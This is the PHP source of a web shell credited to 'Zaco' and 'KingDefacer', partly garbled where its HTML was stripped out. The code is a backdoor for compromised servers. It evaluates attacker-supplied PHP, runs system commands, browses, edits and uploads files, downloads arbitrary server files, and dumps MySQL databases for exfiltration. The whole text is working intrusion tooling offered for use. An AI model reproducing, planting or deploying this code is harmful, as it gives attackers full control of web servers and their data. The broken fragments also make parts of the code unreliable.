Small Web Shell By Zaco - Edited By KingDefacer headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='
###cmd###mysql###eval###
'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?>
'>

without arch gzip archive 

'.htmlspecialchars($cmd)."
\n");
} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
 if(@is_dir($work_dir)) { echo('Listing '.$e_work_dir.'
');
 $handle=@opendir($work_dir);
 if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;
};
 @closedir($handle);
 sort($files);
 $not_dirs=array();
 for($i=0;
$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn)));
 if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
 $group=@posix_getgrgid(@filegroup($work_dir.$fn));
 printf("% 20s|% -20s",$owner['name'],$group['name']);
 } echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
 printf("% 20s ",@filesize($work_dir.$fn).'B');
 printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
 } else {$not_dirs[]=$fn;
} } for($i=0;
$i'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn)));
 if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn));
 $group=@posix_getgrgid(@filegroup($work_dir.$fn));
 printf("% 20s|% -20s",$owner['name'],$group['name']);
 } echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
 printf("% 20s ",@filesize($work_dir.$fn).'B');
 printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
 } echo('
'); ?>

'.$e_work_dir." Edit
\n");
 $f=@fopen($work_dir,'r');
 
?>









Error '.$e_work_dir."
\n");
 else { fwrite($f,$file_text);
 fclose($f);
 echo(''.$e_work_dir." is saving
\n");
 } break;
 } } break;
 } break;
 } case 'upload' : { if($work_dir=='')$work_dir='/';
 else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
 $f=$_FILES["filename"]["name"];
 if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
 else { echo('file is uploaded in '.$e_work_dir);
 } break;
 } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:'';
 $temp_file=isset($_POST['temp_file'])?'on':'nn';
 $f=@fopen($fname,'r');
 if(!($f)) echo('file is not exists');
 else { $archive=isset($_POST['archive'])?$_POST['archive']:'';
 if($archive=='gzip') { Header("Content-Type:application/x-gzip\n");
 $s=gzencode(fread($f,filesize($fname)));
 Header('Content-Length: '.strlen($s)."\n");
 Header('Content-Disposition: attachment;
 filename="'.str_replace('/','-',$fname).".gz\n\n");
 echo($s);
 } else { Header("Content-Type:application/octet-stream\n");
 Header('Content-Length: '.filesize($fname)."\n");
 Header('Content-Disposition: attachment;
 filename="'.str_replace('/','-',$fname)."\n\n");
 ob_start();
 while(feof($f)===false) { echo(fread($f,10000));
 ob_flush();
 } } } } } break;
 } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query';
 $user=isset($_POST['user'])?$_POST['user']:'';
 $passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
 $db=isset($_POST['db'])?$_POST['db']:'';
 $host=isset($_POST['host'])?$_POST['host']:'localhost';
 $query=isset($_POST['query'])?magic_q($_POST['query']):'';
 switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd);
 if(!($mysql_link)) echo('Connect error');
 else { $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
 $archive=isset($_POST['archive'])?$_POST['archive']:'none';
 if($archive!=='none')$to_file=false;
 $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
 $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
 if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
 else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
 ob_start();
 if($to_file){$t_f=@fopen($to_file,'w');
if(!$t_f)die('Cant opening '.$to_file);
}else $t_f=false;
 if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
 header("Content-Disposition: attachment;
 filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
 } $result=mysql_query('show tables',$mysql_link);
 for($i=0;
$i











User :Passwd :Host :DB :







without arch
gzip archive



DB :


Only Table :




Save result to :













\n");
 for($i=0;
$i'.htmlspecialchars(mysql_field_name($result,$i)).' ');
 echo("\n\n");
 for($i=0;
$i');
 for($j=0;
$j'.(htmlspecialchars($rows[$j])).'');
 } echo("\n");
 } echo("\n");
 } mysql_close($mysql_link);
 } break;
 } } break;
 } } 
 echo '
';
?>